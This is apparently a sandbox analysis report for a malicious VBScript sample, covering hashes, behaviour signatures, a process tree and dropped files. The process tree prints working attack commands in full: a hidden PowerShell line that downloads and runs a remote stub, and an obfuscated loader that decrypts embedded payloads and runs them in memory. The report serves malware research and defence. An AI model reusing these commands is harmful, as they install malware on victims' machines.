Analysis
- max time kernel: 117s
- max time network: 117s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 03/12/2024, 17:51
Static task: static1

Behavioral task: behavioral1
- Sample: 2570_output.vbs
- Resource: win7-20240903-en

Behavioral task: behavioral2
- Sample: 2570_output.vbs
- Resource: win10v2004-20241007-en
General
- Target: 2570_output.vbs
- Size: 421KB
- MD5: 1304afcdfc224427dfe647dd10025628
- SHA1: 54de753563e6a041ca67a90e50c121cd32f2e125
- SHA256: 13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace
- SHA512: 23dcf2384265354d1596934f5d428df2518a410fd074ac6127c9f6b6ac896472542620966ffe6c39a3e74157f3eb3f09e2d481ee265f969861fcc5f3bbac0506
- SSDEEP: 6144:URCyzWhqzOEHu+s+7e7C8526sSil7tJA1ikRAG9cuyVa8iix6gwXUhkSn:w8hbmbh7uiWct2yVa8ArUhkSn
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run Powershell and hide display window.
  pid  Process
  2480 powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid  Process
  2480 powershell.exe
  344  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description             pid  Process
  Token: SeDebugPrivilege 2480 powershell.exe
  Token: SeDebugPrivilege 344  powershell.exe
- Suspicious use of WriteProcessMemory (15 IoCs; each write below was recorded 3 times)
  description                          pid  Process      procid_target
  PID 2436 wrote to memory of 2480     2436 WScript.exe  31
  PID 2436 wrote to memory of 1176     2436 WScript.exe  33
  PID 1176 wrote to memory of 2576     1176 cmd.exe      35
  PID 2576 wrote to memory of 2636     2576 cmd.exe      37
  PID 2576 wrote to memory of 344      2576 cmd.exe      38
Processes
- [1] C:\Windows\System32\WScript.exe (PID: 2436)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2570_output.vbs"
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 2480)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\System32\cmd.exe (PID: 1176)
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe (PID: 2576)
      Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe (PID: 2636)
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 344)
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- (unnamed download)
  Filesize: 420KB
  MD5: a21d4680c8d115c444119d6b1ca6aed6
  SHA1: fdbb2d3c7eb9ea5c93781f91bf2157d25f82c2f2
  SHA256: 1f25a0b4e9b17c826aa68d775dab0605edbddf39963943358406285f157b4e9f
  SHA512: b3b9ce5c820399bd7f8f80af4300328a5153ae8b15f2b00c85dba1fc983d02e739cae84ded8e831e845443e3226ff778c146598b0089076fcd9ac59830a47452
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 9f7161d90acb2a9b98ceca68b20e6a25
  SHA1: 5f81a6e810eaaeebb0a9ecf2d062975c6a4c330c
  SHA256: 65bdc84fa5af2800b5f2267f1bd872ff05089790f825ad0d3935c03ebee49afa
  SHA512: 3d2c5eadb23b34b919d47e69409931a02345694b0a38b3f45374bf89868a35f9c2923122a650843d23b3a6dd5d6a24ffdcdbc34b64d7b7ef4c0fcadb1f7b2574
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K8Z5WTW90GAFMXQP4EOV.temp
  Filesize: 7KB
  MD5: cd1eff8caaa3f36fafed05b0d8b6bfb3
  SHA1: b257679eea1317250067439bc10ae77688fd97c2
  SHA256: d930bd507036c9266261ca9e09e43ad778b638b9a67df330216d6937bfa037d8
  SHA512: e952652029f2e80109dd9e56933b6cdc28faff5caf07ec028c4347ade6619c6f2176b8deeabb8a8792112d2886646818e3dde8539196cd639b9d83b4be08c28d